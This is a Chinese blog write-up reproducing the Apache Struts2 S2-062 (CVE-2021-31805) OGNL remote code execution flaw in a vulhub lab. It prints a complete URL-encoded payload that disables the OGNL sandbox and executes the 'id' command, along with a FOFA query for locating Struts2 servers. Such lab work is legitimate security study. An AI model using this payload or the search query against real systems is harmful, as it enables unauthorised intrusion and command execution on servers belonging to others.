【漏洞复现】vulhub struts2/s2-062

于 2023-06-30 12:11:36 发布
阅读量237 收藏 4
点赞数 5
分类专栏: vulhub漏洞复现 文章标签: struts java 后端 安全性测试 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46421742/article/details/131472119
版权

#免责声明:
本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。

本文目录

 vulhub struts2/s2-062 (CVE-2021-31805) 远程代码执行漏洞

 前言

 struts2框架介绍

 3.2struts2 rce

 漏洞原理

 补充

 搜索语法

  FOFA

 本地环境搭建

 漏洞复现

 

 vulhub struts2/s2-062 (CVE-2021-31805) 远程代码执行漏洞

 

 前言

  struts2框架介绍

Struts 2 最初被称为 WebWork 2,它是一个简洁的、可扩展的框架,可用于创建企业级Java web应用框架。设计这个框架是为了从构建、部署、到应用程序维护方面来简化整个开发周期。

Struts 2 是一个基于MVC设计模式的web应用框架:

MVC:模型(Model)、视图(View)、控制器(Controller):

  • 模型 --- 属于软件设计模式的底层基础,主要负责数据维护。
  • 视图 --- 这部分是负责向用户呈现全部或部分数据。
  • 控制器 --- 通过软件代码控制模型和视图之间的交互。

 3.2struts2 rce

Struts 2 在2007年7月23日发布的第一个Struts 2漏洞S2-001 , 到现在已经到披露到 s2-062 不同的Struts 2 版本对应的payload是不同的 

 漏洞原理

开发人员使用%{…} 语法进行强制 OGNL 解析,有一些特殊的TAG属性可以执行二次解析。对不受信任的用户输入使用强制 OGNL 解析可能会导致远程代码执行。

alwaysSelectFullNamespace 正确 - 操作元素未设置名称空间属性,或使用了通配符用户将从 uri 传递命名空间,并将其解析为 OGNL 表达式,最终导致远程代码执行漏洞。

补充

OGNL表达式

        OGNL(Object-Graph Navigation Language的简称),struts框架使用OGNL作为默认的表达式语言。

        它是一种功能强大的表达式语言,通过它简单一致的表达式语法,可以存取对象的任意属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。

        OGNL是通常需要结合Struts 2的标志一起使用的,主要是#、%、$ 这三个符号的使用:

        #:获得contest中的数据;

        %:强制字符串解析成OGNL表达式;

        $:在配置文件中可以使用OGNL表达式。

 搜索语法

  FOFA

app="struts2"

 本地环境搭建

  • kali靶机启动环境
cd vulhub/struts2/s2-061
docker-compose up -d     
docker ps -a

  漏洞复现

 

  • 小插曲:
    发现页面显示不正确,显示的是上一个靶场的页面,这里是因为我使用的浏览器是老版本的火狐,是由于浏览器的缓存原因导致的,如果出现和我一样的情况可试试下面的解决办法。

解决方法:

点击浏览器设置选项,点击隐私选项,清空近期历史记录,勾选缓存,点击立即清除即可。

  • 重新访问靶场地址,出现以下内容证明访问成功

  • Exp利用
id=%25{(%23request.map%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b(%23request.map.setBean(%23request.get('struts.valueStack'))+%3d%3d+true).toString().substring(0,0)+%2b(%23request.map2%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b(%23request.map2.setBean(%23request.get('map').get('context'))+%3d%3d+true).toString().substring(0,0)+%2b(%23request.map3%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b(%23request.map3.setBean(%23request.get('map2').get('memberAccess'))+%3d%3d+true).toString().substring(0,0)+%2b(%23request.get('map3').put('excludedPackageNames',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b(%23request.get('map3').put('excludedClasses',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b(%23application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'id'}))}
  • 使用burp抓包,更改请求方法为post,数据包处拼接EXP内容,点击发送

 响应处显示id值,成功

Yang_peach的博客
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
docker—vulhubstruts2漏洞复现详细过程(s2-001/007/008)
AmyBaby00的博客
11-14 2943
本文为学习笔记,仅限学习交流。 不得利用、从事危害国家或人民安全、荣誉和利益等活动。 请参阅《中华人民共和国网络安全法》 简介&准备: 1、centos7 已开启docker :systemctl restart docker.service 2、进入vulhubstruts2 : cd vulhub/struts2 3、启用测试环境:docker-compose up -d 4、PC...
struts2漏洞s2-045,不升级jar版本的修补方法,已验证.docx
07-04
0、这是一个简单、暴力、治根的补漏方法 1、struts2漏洞s2-045,不升级jar版本的修补方法,已验证
漏洞复现Struts2 S2-062 (CVE-2021-31805) 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
04-15 3126
文章目录声明前言一、漏洞描述二、漏洞原理三、影响版本四、安全版本五、漏洞细节分析六、本地复现七、漏洞修复 声明 本篇文章仅用于技术研究和漏洞复现,切勿从事非法渗透,造成任何影响与本作者无关,切记! 前言 Apache 官方发布了 Apache Struts2 的风险通告,漏洞编号为 CVE-2021-31805,可能会导致远程代码执行。 一、漏洞描述 此次 Apache Struts2 漏洞为 CVE-2020-17530 ( S2-061 )的修复不完整,导致输入验证不正确。 如果开发人员使用%{…}
Struts2 S2-062(CVE-2021-31805)漏洞分析及复现
热门推荐
江左盟的博客
04-20 3万+
简介 2022年4月12日,Apache发布安全公告,修复了一个Apache Struts2 中的远程代码执行漏洞S2-062(CVE-2021-31805),攻击者可以利用此漏洞来控制受影响的系统。该漏洞是由于 2020 年 S2-061(CVE-2020-17530)的不完整修复造成的,当开发人员使用了 %{…} 语法进行强制OGNL解析时,仍有一些特殊的TAG属性可被二次解析,攻击者可构造恶意的OGNL表达式触发漏洞,从而实现远程代码执行。 影响范围 2.0.0 <= Apache Struts
vulhub靶场struts2漏洞复现
weixin_44300286的博客
03-06 2188
0x01、S2-001远程代码执行漏洞 原理 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 影响版本 Struts 2.0.0 - Struts 2.0.8 poc 执行任意命令 %{#a=(new java.lan
[Vulhub] Struts2 S2-057 S2-059 S2-061 漏洞复现
weixin_45605352的博客
06-07 1119
Struts2 S2-057 RCE (CVE-2018-11776) 0x00 漏洞描述 Apache Struts是一个现在较为主流的开源框架,是用于使用Java编程语言开发Web应用程序。 定义XML配置时如果namespace值未设置且上层动作配置(Action Configuration)中未设置或用通配符namespace时可能会导致远程代码执行。 url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行。 0x01 影响版本 Stru
Struts2 (S2-016/S2-017)高危漏洞修复文件
04-06
Struts2 (S2-016/S2-017)高危漏洞修复文件
struts-2.5.16-源码+示例(S2-057漏洞演示环境)
08-24
文件包含struts-2.5.16-源码+示例,利用附件文件可以很方便的搭建出调试S2-057的漏洞环境,欢迎各位取用
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
Struts2 最新漏洞 S2-016、S2-017 修补方案 Struts2 是一个基于 JavaWeb 应用程序框架,由 Apache 软件基金会维护。最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者...
vulhub-struts2-S2-008 远程代码执行漏洞复现
qq_56426046的博客
06-19 435
影响版本: 2.1.0 - 2.3.1。
Struts2 S2-012复现
ZJT6666666的博客
12-22 172
Struts2 S2-012复现
struts2s2-001)远程代码执行漏洞docker&&vulhub复现
qq_43455259的博客
07-12 1699
struts2s2-001)远程代码执行漏洞docker&&vulhub复现
S2-062 远程命令执行漏洞复现(cve-2021-31805)
m0_52400001的博客
04-22 2784
S2-062 远程命令执行漏洞复现(cve-2021-31805)
vulhub靶场搭建以及对于struts2漏洞s2-001的idea环境调试搭建,ctf.show的java(web279-web280)
wanan的博客
09-03 1763
vulhub靶场搭建以及对于struts2漏洞s2-001的idea环境调试搭建,ctf.show的java(web279-web280)
apache struct2 /java 漏洞 s2-062复现
flyingwind2000的博客
07-07 1162
apache struct2 java 漏洞 s2-062 复现 渗透安全
Struts2 S2-062远程代码执行漏洞(CVE-2021-31805)复现
PolarPeak的博客
06-06 1388
远程代码执行S2-062(CVE-2021-31805)由于Apache Struts2S2-061(CVE-2020-17530)的修复不够完整,导致一些标签属性仍然可以执行 OGNL 表达式,攻击者利用该漏洞可以构造恶意数据远程执行任意代码。高危。受影响的版本:Struts 2.0.0 - Struts 2.5.29安全版本:Struts >= 2.5.30漏洞环境复用vulhub/struts2/s2-061/的docker环境,使用版本是struts2.5.25链接:vulhub/struts2/
S2-057,S2-059,s2-061,s2-062漏洞复现
xiaobai_20190815的博客
04-12 2900
一、漏洞描述 当Struts2的标签属性值引用了action对象的参数值时,便会出现OGNL表达式的二次解析,从而产生RCE风险(S2-059的修复方式为只修复了沙盒绕过并没有修复OGNL表达式执行点,因为这个表达式执行触发条件过于苛刻,导致S2-061再次绕过了S2-059的沙盒) 二、影响版本 s2-057:<=Struts 2.3.34,Struts 2.5.16 s2-059:Struts 2.0.0 - Struts 2.5.20 s2-061:Struts 2.0.0-Strut
apache struts2框架命令执行漏洞(s2-045、s2-046)
最新发布
01-11
Apache Struts2框架是一种流行的开源Web应用程序开发框架,但曾经发生过多个命令执行漏洞,其中包括s2-045和s2-046漏洞s2-045漏洞源于在处理远程表达式语言(OGNL)时存在安全漏洞,攻击者可以利用构造特定的HTTP请求发送恶意代码,导致服务器执行该恶意代码,从而获取系统权限。 而s2-046漏洞则是由于Struts2框架中对传入参数的处理不当,攻击者可以通过构造特定的HTTP请求,触发服务器执行恶意代码。 这两个漏洞都存在严重的安全风险,可能导致服务器受到攻击,甚至导致系统被入侵。为了防范这些漏洞,用户应该及时更新Struts2框架的最新版本,开发人员也需要对传入的参数进行严格的验证和过滤,避免恶意代码的执行。此外,安全团队也应该定期对服务器进行安全漏洞扫描和修复,以确保系统的安全性。 总之,对于Apache Struts2框架的命令执行漏洞,我们需要重视并采取有效的措施来防范和修复,以确保系统的安全性和稳定性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Yang_peach的博客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值